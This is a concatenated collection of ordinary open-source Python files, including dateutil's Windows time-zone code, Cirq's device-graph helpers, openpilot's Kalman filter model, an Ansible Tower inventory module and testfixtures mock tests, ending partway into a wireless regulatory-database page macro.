    def _isdst(self, dt):
        # DST starts at the _dst* rule and ends at the _std* rule.
        dston = picknthweekday(dt.year, self._dstmonth, self._dstdayofweek,
                               self._dsthour, self._dstminute,
                               self._dstweeknumber)
        dstoff = picknthweekday(dt.year, self._stdmonth, self._stddayofweek,
                                self._stdhour, self._stdminute,
                                self._stdweeknumber)
        # The inverted comparison handles zones whose DST period wraps the
        # new year (start date later in the year than the end date).
        if dston < dstoff:
            return dston <= dt.replace(tzinfo=None) < dstoff
        else:
            return not dstoff <= dt.replace(tzinfo=None) < dston
class tzwin(tzwinbase):
    """A named Windows time zone, loaded from the registry by zone name."""
    def __init__(self, name):
        self._name = name
        handle = _winreg.ConnectRegistry(None, _winreg.HKEY_LOCAL_MACHINE)
        tzkey = _winreg.OpenKey(handle, "%s\%s" % (TZKEYNAME, name))
        keydict = valuestodict(tzkey)
        tzkey.Close()
        handle.Close()
        self._stdname = keydict["Std"].encode("iso-8859-1")
        self._dstname = keydict["Dlt"].encode("iso-8859-1")
        self._display = keydict["Display"]
        # See http://ww_winreg.jsiinc.com/SUBA/tip0300/rh0398.htm
        # "TZI" is a packed REG_TZI_FORMAT: Bias, StandardBias, DaylightBias
        # (three longs) followed by two SYSTEMTIME structs (8 shorts each).
        tup = struct.unpack("=3l16h", keydict["TZI"])
        self._stdoffset = -tup[0]-tup[1]          # Bias + StandardBias * -1
        self._dstoffset = self._stdoffset-tup[2]  # + DaylightBias * -1
        # Shorts 4..8 describe the transition back to standard time.
        (self._stdmonth,
         self._stddayofweek,   # Sunday = 0
         self._stdweeknumber,  # Last = 5
         self._stdhour,
         self._stdminute) = tup[4:9]
        # Shorts 12..16 describe the transition into daylight time.
        (self._dstmonth,
         self._dstdayofweek,   # Sunday = 0
         self._dstweeknumber,  # Last = 5
         self._dsthour,
         self._dstminute) = tup[12:17]
    def __repr__(self):
        return "tzwin(%s)" % repr(self._name)
    def __reduce__(self):
        # Pickle support: reconstruct from the registry zone name.
        return (self.__class__, (self._name,))
class tzwinlocal(tzwinbase):
    """The machine's currently configured local Windows time zone."""
    def __init__(self):
        handle = _winreg.ConnectRegistry(None, _winreg.HKEY_LOCAL_MACHINE)
        tzlocalkey = _winreg.OpenKey(handle, TZLOCALKEYNAME)
        keydict = valuestodict(tzlocalkey)
        tzlocalkey.Close()
        self._stdname = keydict["StandardName"].encode("iso-8859-1")
        self._dstname = keydict["DaylightName"].encode("iso-8859-1")
        # The display string lives under the zone's own key; it may be
        # missing, in which case display() returns None.
        try:
            tzkey = _winreg.OpenKey(handle, "%s\%s"%(TZKEYNAME, self._stdname))
            _keydict = valuestodict(tzkey)
            self._display = _keydict["Display"]
            tzkey.Close()
        except OSError:
            self._display = None
        handle.Close()
        # Offsets are stored as separate DWORD values here (not packed TZI).
        self._stdoffset = -keydict["Bias"]-keydict["StandardBias"]
        self._dstoffset = self._stdoffset-keydict["DaylightBias"]
        # See http://ww_winreg.jsiinc.com/SUBA/tip0300/rh0398.htm
        # SYSTEMTIME layout: year, month, dayofweek, day(week#), hour, min...
        tup = struct.unpack("=8h", keydict["StandardStart"])
        (self._stdmonth,
         self._stddayofweek,   # Sunday = 0
         self._stdweeknumber,  # Last = 5
         self._stdhour,
         self._stdminute) = tup[1:6]
        tup = struct.unpack("=8h", keydict["DaylightStart"])
        (self._dstmonth,
         self._dstdayofweek,   # Sunday = 0
         self._dstweeknumber,  # Last = 5
         self._dsthour,
         self._dstminute) = tup[1:6]
    def __reduce__(self):
        # Pickle support: re-read the local zone on unpickling.
        return (self.__class__, ())
def picknthweekday(year, month, dayofweek, hour, minute, whichweek):
    """dayofweek == 0 means Sunday, whichweek 5 means last instance"""
    # First day of the target month at the transition's wall-clock time.
    first = datetime.datetime(year, month, 1, hour, minute)
    # First occurrence of `dayofweek` in the month (day lands in 1..7).
    # dayofweek is Windows-style (Sunday == 0) while isoweekday() is ISO
    # (Monday == 1 .. Sunday == 7); the modulo arithmetic reconciles them.
    weekdayone = first.replace(day=((dayofweek-first.isoweekday())%7+1))
    # Try candidates from the latest week back toward week one, returning the
    # first that still falls inside the month (this is how whichweek == 5,
    # "last instance", resolves).
    # NOTE(review): candidate offsets run whichweek..1 weeks past weekdayone,
    # so weekdayone itself is never a candidate and the function implicitly
    # returns None when nothing matches -- looks off by one week for small
    # whichweek values; confirm against upstream dateutil before changing.
    for n in xrange(whichweek):
        dt = weekdayone+(whichweek-n)*ONEWEEK
        if dt.month == month:
            return dt
def valuestodict(key):
    """Convert a registry key's values to a dictionary."""
    result = {}
    # QueryInfoKey()[1] is the number of values stored under the key.
    for index in range(_winreg.QueryInfoKey(key)[1]):
        name, value, _ = _winreg.EnumValue(key, index)
        result[name] = value
    return result
| gpl-3.0 |
quantumlib/Cirq | cirq-core/cirq/contrib/routing/device.py | 1 | 3170 | # Copyright 2019 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
from typing import Iterable, Tuple, Dict, Any
import networkx as nx
import cirq
from cirq._compat import deprecated
@deprecated(deadline="v0.12", fix="use gridqubits_to_graph_device(device.qubits) instead")
def xmon_device_to_graph(device: Any) -> nx.Graph:
    """Gets the graph of an XmonDevice.
    Deprecated compatibility shim; delegates to gridqubits_to_graph_device
    on the device's qubits.
    """
    return gridqubits_to_graph_device(device.qubits)
def get_linear_device_graph(n_qubits: int) -> nx.Graph:
    """Gets the graph of a linearly connected device."""
    qubits = cirq.LineQubit.range(n_qubits)
    # Pair each qubit with its immediate neighbour on the line.
    return nx.Graph(zip(qubits, qubits[1:]))
def get_grid_device_graph(*args, **kwargs) -> nx.Graph:
    """Gets the graph of a grid of qubits.
    See GridQubit.rect for argument details."""
    # Arguments are forwarded verbatim to GridQubit.rect (rows, cols, ...).
    return gridqubits_to_graph_device(cirq.GridQubit.rect(*args, **kwargs))
def gridqubits_to_graph_device(qubits: Iterable[cirq.GridQubit]):
    """Gets the graph of a set of grid qubits."""
    # Qubits at Manhattan distance 1 are physically adjacent and share an
    # edge in the device connectivity graph.
    adjacent_pairs = (
        (a, b)
        for a, b in itertools.combinations(qubits, 2)
        if _manhattan_distance(a, b) == 1
    )
    return nx.Graph(adjacent_pairs)
def _manhattan_distance(qubit1: cirq.GridQubit, qubit2: cirq.GridQubit) -> int:
    """L1 (Manhattan) distance between two grid qubits."""
    row_delta = qubit1.row - qubit2.row
    col_delta = qubit1.col - qubit2.col
    return abs(row_delta) + abs(col_delta)
def nx_qubit_layout(graph: nx.Graph) -> Dict[cirq.Qid, Tuple[float, float]]:
    """Return a layout for a graph for nodes which are qubits.
    This can be used in place of nx.spring_layout or other networkx layouts.
    GridQubits are positioned according to their row/col. LineQubits are
    positioned in a line.
    >>> import cirq.contrib.routing as ccr
    >>> import networkx as nx
    >>> import matplotlib.pyplot as plt
    >>> # Clear plot state to prevent issues with pyplot dimensionality.
    >>> plt.clf()
    >>> g = ccr.gridqubits_to_graph_device(cirq.GridQubit.rect(4,5))
    >>> pos = ccr.nx_qubit_layout(g)
    >>> nx.draw_networkx(g, pos=pos)
    """
    pos: Dict[cirq.Qid, Tuple[float, float]] = {}
    # Built lazily, only if the graph contains non-Grid/Line nodes.
    _node_to_i_cache = None
    for node in graph.nodes:
        if isinstance(node, cirq.GridQubit):
            # Row is negated so the plot matches the device's orientation.
            pos[node] = (node.col, -node.row)
        elif isinstance(node, cirq.LineQubit):
            # Offset to avoid overlap with gridqubits
            pos[node] = (node.x, 0.5)
        else:
            if _node_to_i_cache is None:
                _node_to_i_cache = {n: i for i, n in enumerate(sorted(graph.nodes))}
            # Position in a line according to sort order
            # Offset to avoid overlap with gridqubits
            pos[node] = (0.5, _node_to_i_cache[node] + 1)
    return pos
| apache-2.0 |
vntarasov/openpilot | selfdrive/locationd/models/live_kf.py | 1 | 12011 | #!/usr/bin/env python3
import sys
import numpy as np
import sympy as sp
from selfdrive.locationd.models.constants import ObservationKind
from rednose.helpers.ekf_sym import EKF_sym, gen_code
from rednose.helpers.sympy_helpers import euler_rotate, quat_matrix_r, quat_rotate
EARTH_GM = 3.986005e14 # m^3/s^2 (gravitational constant * mass of earth)
class States():
  """Named slices into the Kalman filter state vectors.

  The first group indexes the nominal state; the *_ERR slices index the
  error state, which represents orientation as 3 Euler-angle errors rather
  than a 4-component quaternion (hence the shifted offsets).
  """
  ECEF_POS = slice(0, 3) # x, y and z in ECEF in meters
  ECEF_ORIENTATION = slice(3, 7) # quat for pose of phone in ecef
  ECEF_VELOCITY = slice(7, 10) # ecef velocity in m/s
  ANGULAR_VELOCITY = slice(10, 13) # roll, pitch and yaw rates in device frame in radians/s
  GYRO_BIAS = slice(13, 16) # roll, pitch and yaw biases
  ODO_SCALE = slice(16, 17) # odometer scale
  ACCELERATION = slice(17, 20) # Acceleration in device frame in m/s**2
  IMU_OFFSET = slice(20, 23) # imu offset angles in radians
  # Error-state has different slices because it is an ESKF
  ECEF_POS_ERR = slice(0, 3)
  ECEF_ORIENTATION_ERR = slice(3, 6) # euler angles for orientation error
  ECEF_VELOCITY_ERR = slice(6, 9)
  ANGULAR_VELOCITY_ERR = slice(9, 12)
  GYRO_BIAS_ERR = slice(12, 15)
  ODO_SCALE_ERR = slice(15, 16)
  ACCELERATION_ERR = slice(16, 19)
  IMU_OFFSET_ERR = slice(19, 22)
class LiveKalman():
  """Error-state Kalman filter (ESKF) estimating device pose in ECEF.

  The nominal state (see States) tracks position, orientation quaternion,
  velocity, angular rates, gyro biases, odometer scale, acceleration and
  IMU mounting offset; the error state parameterizes orientation error with
  3 Euler angles, which is why its dimension is one smaller.
  generate_code() emits the symbolic model to C via rednose's gen_code.
  """
  name = 'live'
  # Initial nominal state: a rough ECEF position, identity quaternion,
  # zero rates/biases and unit odometer scale.
  initial_x = np.array([-2.7e6, 4.2e6, 3.8e6,
                        1, 0, 0, 0,
                        0, 0, 0,
                        0, 0, 0,
                        0, 0, 0,
                        1,
                        0, 0, 0,
                        0, 0, 0])
  # state covariance
  initial_P_diag = np.array([1e16, 1e16, 1e16,
                             1e6, 1e6, 1e6,
                             1e4, 1e4, 1e4,
                             1**2, 1**2, 1**2,
                             0.05**2, 0.05**2, 0.05**2,
                             0.02**2,
                             1**2, 1**2, 1**2,
                             (0.01)**2, (0.01)**2, (0.01)**2])
  # process noise
  # NOTE(review): the orientation row's middle term is 0.001*2 (== 0.002),
  # unlike every other entry which is a squared standard deviation -- this
  # looks like a typo for 0.001**2, but changing it alters filter tuning;
  # confirm against upstream before fixing.
  Q = np.diag([0.03**2, 0.03**2, 0.03**2,
               0.001**2, 0.001*2, 0.001**2,
               0.01**2, 0.01**2, 0.01**2,
               0.1**2, 0.1**2, 0.1**2,
               (0.005 / 100)**2, (0.005 / 100)**2, (0.005 / 100)**2,
               (0.02 / 100)**2,
               3**2, 3**2, 3**2,
               (0.05 / 60)**2, (0.05 / 60)**2, (0.05 / 60)**2])
  @staticmethod
  def generate_code(generated_dir):
    """Build the symbolic dynamics/observation model and emit C sources
    for this filter into `generated_dir`."""
    name = LiveKalman.name
    dim_state = LiveKalman.initial_x.shape[0]
    dim_state_err = LiveKalman.initial_P_diag.shape[0]
    state_sym = sp.MatrixSymbol('state', dim_state, 1)
    state = sp.Matrix(state_sym)
    # Unpack the nominal state into named symbols.
    x, y, z = state[States.ECEF_POS, :]
    q = state[States.ECEF_ORIENTATION, :]
    v = state[States.ECEF_VELOCITY, :]
    vx, vy, vz = v
    omega = state[States.ANGULAR_VELOCITY, :]
    vroll, vpitch, vyaw = omega
    roll_bias, pitch_bias, yaw_bias = state[States.GYRO_BIAS, :]
    odo_scale = state[States.ODO_SCALE, :][0, :]
    acceleration = state[States.ACCELERATION, :]
    imu_angles = state[States.IMU_OFFSET, :]
    dt = sp.Symbol('dt')
    # calibration and attitude rotation matrices
    quat_rot = quat_rotate(*q)
    # Got the quat predict equations from here
    # A New Quaternion-Based Kalman Filter for
    # Real-Time Attitude Estimation Using the Two-Step
    # Geometrically-Intuitive Correction Algorithm
    A = 0.5 * sp.Matrix([[0, -vroll, -vpitch, -vyaw],
                         [vroll, 0, vyaw, -vpitch],
                         [vpitch, -vyaw, 0, vroll],
                         [vyaw, vpitch, -vroll, 0]])
    q_dot = A * q
    # Time derivative of the state as a function of state
    state_dot = sp.Matrix(np.zeros((dim_state, 1)))
    state_dot[States.ECEF_POS, :] = v
    state_dot[States.ECEF_ORIENTATION, :] = q_dot
    state_dot[States.ECEF_VELOCITY, 0] = quat_rot * acceleration
    # Basic descretization, 1st order intergrator
    # Can be pretty bad if dt is big
    f_sym = state + dt * state_dot
    state_err_sym = sp.MatrixSymbol('state_err', dim_state_err, 1)
    state_err = sp.Matrix(state_err_sym)
    quat_err = state_err[States.ECEF_ORIENTATION_ERR, :]
    v_err = state_err[States.ECEF_VELOCITY_ERR, :]
    omega_err = state_err[States.ANGULAR_VELOCITY_ERR, :]
    acceleration_err = state_err[States.ACCELERATION_ERR, :]
    # Time derivative of the state error as a function of state error and state
    quat_err_matrix = euler_rotate(quat_err[0], quat_err[1], quat_err[2])
    q_err_dot = quat_err_matrix * quat_rot * (omega + omega_err)
    state_err_dot = sp.Matrix(np.zeros((dim_state_err, 1)))
    state_err_dot[States.ECEF_POS_ERR, :] = v_err
    state_err_dot[States.ECEF_ORIENTATION_ERR, :] = q_err_dot
    state_err_dot[States.ECEF_VELOCITY_ERR, :] = quat_err_matrix * quat_rot * (acceleration + acceleration_err)
    f_err_sym = state_err + dt * state_err_dot
    # Observation matrix modifier
    # Maps error-state perturbations into the nominal-state space (the
    # quaternion block converts 3 Euler errors into 4 quat components).
    H_mod_sym = sp.Matrix(np.zeros((dim_state, dim_state_err)))
    H_mod_sym[States.ECEF_POS, States.ECEF_POS_ERR] = np.eye(States.ECEF_POS.stop - States.ECEF_POS.start)
    H_mod_sym[States.ECEF_ORIENTATION, States.ECEF_ORIENTATION_ERR] = 0.5 * quat_matrix_r(state[3:7])[:, 1:]
    H_mod_sym[States.ECEF_ORIENTATION.stop:, States.ECEF_ORIENTATION_ERR.stop:] = np.eye(dim_state - States.ECEF_ORIENTATION.stop)
    # these error functions are defined so that say there
    # is a nominal x and true x:
    # true x = err_function(nominal x, delta x)
    # delta x = inv_err_function(nominal x, true x)
    nom_x = sp.MatrixSymbol('nom_x', dim_state, 1)
    true_x = sp.MatrixSymbol('true_x', dim_state, 1)
    delta_x = sp.MatrixSymbol('delta_x', dim_state_err, 1)
    err_function_sym = sp.Matrix(np.zeros((dim_state, 1)))
    # Small-angle error quaternion [1, dq/2] composed onto the nominal quat.
    delta_quat = sp.Matrix(np.ones((4)))
    delta_quat[1:, :] = sp.Matrix(0.5 * delta_x[States.ECEF_ORIENTATION_ERR, :])
    err_function_sym[States.ECEF_POS, :] = sp.Matrix(nom_x[States.ECEF_POS, :] + delta_x[States.ECEF_POS_ERR, :])
    err_function_sym[States.ECEF_ORIENTATION, 0] = quat_matrix_r(nom_x[States.ECEF_ORIENTATION, 0]) * delta_quat
    err_function_sym[States.ECEF_ORIENTATION.stop:, :] = sp.Matrix(nom_x[States.ECEF_ORIENTATION.stop:, :] + delta_x[States.ECEF_ORIENTATION_ERR.stop:, :])
    inv_err_function_sym = sp.Matrix(np.zeros((dim_state_err, 1)))
    inv_err_function_sym[States.ECEF_POS_ERR, 0] = sp.Matrix(-nom_x[States.ECEF_POS, 0] + true_x[States.ECEF_POS, 0])
    delta_quat = quat_matrix_r(nom_x[States.ECEF_ORIENTATION, 0]).T * true_x[States.ECEF_ORIENTATION, 0]
    inv_err_function_sym[States.ECEF_ORIENTATION_ERR, 0] = sp.Matrix(2 * delta_quat[1:])
    inv_err_function_sym[States.ECEF_ORIENTATION_ERR.stop:, 0] = sp.Matrix(-nom_x[States.ECEF_ORIENTATION.stop:, 0] + true_x[States.ECEF_ORIENTATION.stop:, 0])
    eskf_params = [[err_function_sym, nom_x, delta_x],
                   [inv_err_function_sym, nom_x, true_x],
                   H_mod_sym, f_err_sym, state_err_sym]
    #
    # Observation functions
    #
    #imu_rot = euler_rotate(*imu_angles)
    h_gyro_sym = sp.Matrix([vroll + roll_bias,
                            vpitch + pitch_bias,
                            vyaw + yaw_bias])
    pos = sp.Matrix([x, y, z])
    # Point-mass gravity rotated into the device frame.
    gravity = quat_rot.T * ((EARTH_GM / ((x**2 + y**2 + z**2)**(3.0 / 2.0))) * pos)
    h_acc_sym = (gravity + acceleration)
    h_phone_rot_sym = sp.Matrix([vroll, vpitch, vyaw])
    # Small epsilon keeps the gradient finite at zero velocity.
    speed = sp.sqrt(vx**2 + vy**2 + vz**2 + 1e-6)
    h_speed_sym = sp.Matrix([speed * odo_scale])
    h_pos_sym = sp.Matrix([x, y, z])
    h_vel_sym = sp.Matrix([vx, vy, vz])
    h_orientation_sym = q
    h_imu_frame_sym = sp.Matrix(imu_angles)
    h_relative_motion = sp.Matrix(quat_rot.T * v)
    obs_eqs = [[h_speed_sym, ObservationKind.ODOMETRIC_SPEED, None],
               [h_gyro_sym, ObservationKind.PHONE_GYRO, None],
               [h_phone_rot_sym, ObservationKind.NO_ROT, None],
               [h_acc_sym, ObservationKind.PHONE_ACCEL, None],
               [h_pos_sym, ObservationKind.ECEF_POS, None],
               [h_vel_sym, ObservationKind.ECEF_VEL, None],
               [h_orientation_sym, ObservationKind.ECEF_ORIENTATION_FROM_GPS, None],
               [h_relative_motion, ObservationKind.CAMERA_ODO_TRANSLATION, None],
               [h_phone_rot_sym, ObservationKind.CAMERA_ODO_ROTATION, None],
               [h_imu_frame_sym, ObservationKind.IMU_FRAME, None]]
    gen_code(generated_dir, name, f_sym, dt, state_sym, obs_eqs, dim_state, dim_state_err, eskf_params)
  def __init__(self, generated_dir):
    """Load the generated filter implementation from `generated_dir`."""
    self.dim_state = self.initial_x.shape[0]
    self.dim_state_err = self.initial_P_diag.shape[0]
    # Per-observation-kind default measurement covariances.
    self.obs_noise = {ObservationKind.ODOMETRIC_SPEED: np.atleast_2d(0.2**2),
                      ObservationKind.PHONE_GYRO: np.diag([0.025**2, 0.025**2, 0.025**2]),
                      ObservationKind.PHONE_ACCEL: np.diag([.5**2, .5**2, .5**2]),
                      ObservationKind.CAMERA_ODO_ROTATION: np.diag([0.05**2, 0.05**2, 0.05**2]),
                      ObservationKind.IMU_FRAME: np.diag([0.05**2, 0.05**2, 0.05**2]),
                      ObservationKind.NO_ROT: np.diag([0.00025**2, 0.00025**2, 0.00025**2]),
                      ObservationKind.ECEF_POS: np.diag([5**2, 5**2, 5**2]),
                      ObservationKind.ECEF_VEL: np.diag([.5**2, .5**2, .5**2]),
                      ObservationKind.ECEF_ORIENTATION_FROM_GPS: np.diag([.2**2, .2**2, .2**2, .2**2])}
    # init filter
    self.filter = EKF_sym(generated_dir, self.name, self.Q, self.initial_x, np.diag(self.initial_P_diag), self.dim_state, self.dim_state_err, max_rewind_age=0.2)
  @property
  def x(self):
    # Current nominal state vector.
    return self.filter.state()
  @property
  def t(self):
    # Time of the last processed measurement.
    return self.filter.filter_time
  @property
  def P(self):
    # Current error-state covariance.
    return self.filter.covs()
  def rts_smooth(self, estimates):
    """Rauch-Tung-Striebel smoothing over a sequence of estimates."""
    return self.filter.rts_smooth(estimates, norm_quats=True)
  def init_state(self, state, covs_diag=None, covs=None, filter_time=None):
    """(Re)initialize the filter state; covariance may be given as a
    diagonal, a full matrix, or kept from the current filter."""
    if covs_diag is not None:
      P = np.diag(covs_diag)
    elif covs is not None:
      P = covs
    else:
      P = self.filter.covs()
    self.filter.init_state(state, P, filter_time)
  def predict_and_observe(self, t, kind, meas, R=None):
    """Predict to time t and fuse `meas` of the given ObservationKind.
    Camera-odometry and odometric-speed kinds carry per-sample noise and
    are routed to dedicated handlers; otherwise R defaults per kind."""
    if len(meas) > 0:
      meas = np.atleast_2d(meas)
    if kind == ObservationKind.CAMERA_ODO_TRANSLATION:
      r = self.predict_and_update_odo_trans(meas, t, kind)
    elif kind == ObservationKind.CAMERA_ODO_ROTATION:
      r = self.predict_and_update_odo_rot(meas, t, kind)
    elif kind == ObservationKind.ODOMETRIC_SPEED:
      r = self.predict_and_update_odo_speed(meas, t, kind)
    else:
      if R is None:
        R = self.get_R(kind, len(meas))
      elif len(R.shape) == 2:
        R = R[None]
      r = self.filter.predict_and_update_batch(t, kind, meas, R)
    # Normalize quats
    # (the linearized update does not preserve unit norm)
    quat_norm = np.linalg.norm(self.filter.x[3:7, 0])
    self.filter.x[States.ECEF_ORIENTATION, 0] = self.filter.x[States.ECEF_ORIENTATION, 0] / quat_norm
    return r
  def get_R(self, kind, n):
    """Stack the default noise for `kind` into an (n, dim, dim) batch."""
    obs_noise = self.obs_noise[kind]
    dim = obs_noise.shape[0]
    R = np.zeros((n, dim, dim))
    for i in range(n):
      R[i, :, :] = obs_noise
    return R
  def predict_and_update_odo_speed(self, speed, t, kind):
    # Fixed 0.2 m/s standard deviation per speed sample.
    z = np.array(speed)
    R = np.zeros((len(speed), 1, 1))
    for i, _ in enumerate(z):
      R[i, :, :] = np.diag([0.2**2])
    return self.filter.predict_and_update_batch(t, kind, z, R)
  def predict_and_update_odo_trans(self, trans, t, kind):
    # Columns 0:3 are the measurement, 3:6 its standard deviations.
    z = trans[:, :3]
    R = np.zeros((len(trans), 3, 3))
    for i, _ in enumerate(z):
      R[i, :, :] = np.diag(trans[i, 3:]**2)
    return self.filter.predict_and_update_batch(t, kind, z, R)
  def predict_and_update_odo_rot(self, rot, t, kind):
    # Columns 0:3 are the measurement, 3:6 its standard deviations.
    z = rot[:, :3]
    R = np.zeros((len(rot), 3, 3))
    for i, _ in enumerate(z):
      R[i, :, :] = np.diag(rot[i, 3:]**2)
    return self.filter.predict_and_update_batch(t, kind, z, R)
if __name__ == "__main__":
  # Code-generation entry point used by the build: writes the generated
  # filter sources into the requested directory.
  # NOTE(review): reads sys.argv[2] (not argv[1]) -- the build apparently
  # passes an extra leading argument; confirm before invoking standalone.
  generated_dir = sys.argv[2]
  LiveKalman.generate_code(generated_dir)
| mit |
lmprice/ansible | lib/ansible/modules/web_infrastructure/ansible_tower/tower_inventory.py | 18 | 3741 | #!/usr/bin/python
# coding: utf-8 -*-
# (c) 2017, Wayne Witzel III <wayne@riotousliving.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: tower_inventory
version_added: "2.3"
author: "Wayne Witzel III (@wwitzel3)"
short_description: create, update, or destroy Ansible Tower inventory.
description:
- Create, update, or destroy Ansible Tower inventories. See
U(https://www.ansible.com/tower) for an overview.
options:
name:
description:
- The name to use for the inventory.
required: True
description:
description:
- The description to use for the inventory.
organization:
description:
- Organization the inventory belongs to.
required: True
variables:
description:
- Inventory variables. Use C(@) to get from file.
state:
description:
- Desired state of the resource.
default: "present"
choices: ["present", "absent"]
extends_documentation_fragment: tower
'''
EXAMPLES = '''
- name: Add tower inventory
tower_inventory:
name: "Foo Inventory"
description: "Our Foo Cloud Servers"
organization: "Bar Org"
state: present
tower_config_file: "~/tower_cli.cfg"
'''
from ansible.module_utils.ansible_tower import tower_argument_spec, tower_auth_config, tower_check_mode, HAS_TOWER_CLI
try:
import tower_cli
import tower_cli.utils.exceptions as exc
from tower_cli.conf import settings
except ImportError:
pass
def main():
    """Create, update or delete a Tower inventory via tower-cli.

    Exits through module.exit_json on success or module.fail_json on error.
    """
    argument_spec = tower_argument_spec()
    argument_spec.update(dict(
        name=dict(required=True),
        description=dict(),
        organization=dict(required=True),
        variables=dict(),
        state=dict(choices=['present', 'absent'], default='present'),
    ))

    module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True)

    # Fail early if the optional tower_cli import at module scope failed.
    if not HAS_TOWER_CLI:
        module.fail_json(msg='ansible-tower-cli required for this module')

    name = module.params.get('name')
    description = module.params.get('description')
    organization = module.params.get('organization')
    variables = module.params.get('variables')
    state = module.params.get('state')
    json_output = {'inventory': name, 'state': state}

    # Apply Tower connection settings (host, credentials) for the duration
    # of the API calls below.
    tower_auth = tower_auth_config(module)
    with settings.runtime_values(**tower_auth):
        tower_check_mode(module)
        inventory = tower_cli.get_resource('inventory')

        try:
            # The inventory is addressed by name within its organization, so
            # resolve the organization to an id first.
            org_res = tower_cli.get_resource('organization')
            org = org_res.get(name=organization)

            if state == 'present':
                # create_on_missing makes this an idempotent upsert.
                result = inventory.modify(name=name, organization=org['id'], variables=variables,
                                          description=description, create_on_missing=True)
                json_output['id'] = result['id']
            elif state == 'absent':
                result = inventory.delete(name=name, organization=org['id'])
        except (exc.NotFound) as excinfo:
            module.fail_json(msg='Failed to update inventory, organization not found: {0}'.format(excinfo), changed=False)
        except (exc.ConnectionError, exc.BadRequest) as excinfo:
            module.fail_json(msg='Failed to update inventory: {0}'.format(excinfo), changed=False)

    json_output['changed'] = result['changed']
    module.exit_json(**json_output)
from ansible.module_utils.basic import AnsibleModule
# Entry point when Ansible executes the module directly.
if __name__ == '__main__':
    main()
| gpl-3.0 |
Simplistix/testfixtures | testfixtures/tests/test_mock.py | 1 | 2245 | from testfixtures.mock import Mock, call, ANY
from .test_compare import CompareHelper
class TestCall(CompareHelper):
    """Comparison behaviour of ``call`` objects against each other and
    against plain tuples / sentinels."""

    @staticmethod
    def _diff(left, right):
        # The exact failure message check_raises expects for a mismatch.
        return "\n'{0}'\n!=\n'{1}'".format(left, right)

    def test_non_root_call_not_equal(self):
        self.check_raises(
            call.foo().bar(),
            call.baz().bar(),
            self._diff('call.foo().bar()', 'call.baz().bar()'),
        )

    def test_non_root_attr_not_equal(self):
        self.check_raises(
            call.foo.bar(),
            call.baz.bar(),
            self._diff('call.foo.bar()', 'call.baz.bar()'),
        )

    def test_non_root_params_not_equal(self):
        # Only the differing leading segment appears in the message.
        self.check_raises(
            call.foo(x=1).bar(),
            call.foo(x=2).bar(),
            self._diff('call.foo(x=1)', 'call.foo(x=2)'),
        )

    def test_any(self):
        assert call == ANY

    def test_no_len(self):
        assert not (call == object())

    def test_two_elements(self):
        mock = Mock()
        mock(x=1)
        assert mock.call_args == ((), {'x': 1})

    def test_other_empty(self):
        assert call == ()

    def test_other_single(self):
        # A one-tuple holding args, kwargs or a name all compare equal.
        for other in (((),), ({},), ('',)):
            assert call == other

    def test_other_double(self):
        for other in (('', ()), ('', {})):
            assert call == other

    def test_other_quad(self):
        assert not (call == (1, 2, 3, 4))
class TestMock(CompareHelper):
    """Same non-root ``call`` comparisons as TestCall, but driven through a
    Mock's recorded ``mock_calls``."""

    def _check_last_call(self, mock, expected, message):
        # Compare the most recently recorded call against *expected*.
        self.check_raises(mock.mock_calls[-1], expected, message)

    def test_non_root_call_not_equal(self):
        mock = Mock()
        mock.foo().bar()
        self._check_last_call(
            mock,
            call.baz().bar(),
            "\n'call.foo().bar()'\n!=\n'call.baz().bar()'",
        )

    def test_non_root_attr_not_equal(self):
        mock = Mock()
        mock.foo.bar()
        self._check_last_call(
            mock,
            call.baz.bar(),
            "\n'call.foo.bar()'\n!=\n'call.baz.bar()'",
        )

    def test_non_root_params_not_equal(self):
        mock = Mock()
        mock.foo(x=1).bar()
        # surprising and annoying (and practically unsolvable :-/):
        assert mock.mock_calls[-1] == call.foo(y=2).bar()
| mit |
Distrotech/wireless-regdb | web/Regulatory.py | 11 | 4825 | # -*- coding: iso-8859-1 -*-
"""
Regulatory Database
@copyright: 2008 Johannes Berg
@license: ISC, see LICENSE for details.
"""
import codecs, math
from dbparse import DBParser, flag_definitions
Dependencies = ["time"]
def _country(macro, countries, code):
    """Render the regulatory permission table for a single country.

    macro: MoinMoin macro object providing the formatter and request.
    countries: mapping of alpha-2 code -> parsed country record.
    code: ISO 3166 alpha-2 country code to render.
    Returns the rendered page fragment as a single string.
    """
    result = []
    f = macro.formatter

    result.extend([
        f.heading(1, 1),
        f.text('Regulatory definition for %s' % _get_iso_code(code)),
        f.heading(0, 1),
    ])

    try:
        country = countries[code]
    # Fixed: this was a bare `except:`, which would also swallow unrelated
    # failures (including KeyboardInterrupt/SystemExit). Only a missing
    # country code is expected here.
    except KeyError:
        result.append(f.text('No information available'))
        return ''.join(result)

    if country.comments:
        result.extend([
            f.preformatted(1),
            f.text('\n'.join(country.comments)),
            f.preformatted(0),
        ])

    result.append(f.table(1))
    result.extend([
        f.table_row(1),
        f.table_cell(1), f.strong(1),
        f.text('Band [MHz]'),
        f.strong(0), f.table_cell(0),
        f.table_cell(1), f.strong(1),
        f.text('Max BW [MHz]'),
        f.strong(0), f.table_cell(0),
        f.table_cell(1), f.strong(1),
        f.text('Flags'),
        f.strong(0), f.table_cell(0),
        f.table_cell(1), f.strong(1),
        f.text('Max antenna gain [dBi]'),
        f.strong(0), f.table_cell(0),
        f.table_cell(1), f.strong(1),
        f.text('Max EIRP [dBm'),
        f.hardspace,
        f.text('(mW)]'),
        f.strong(0), f.table_cell(0),
        f.table_row(0),
    ])

    # Hoisted out of the loop (it was redefined per permission but does not
    # depend on the loop variable). Formats an optional value, converting
    # dBm to mW alongside when requested.
    def str_or_na(val, dBm=False):
        if val and not dBm:
            return '%.2f' % val
        elif val:
            return '%.2f (%.2f)' % (val, math.pow(10, val/10.0))
        return 'N/A'

    for perm in country.permissions:
        result.extend([
            f.table_row(1),
            f.table_cell(1),
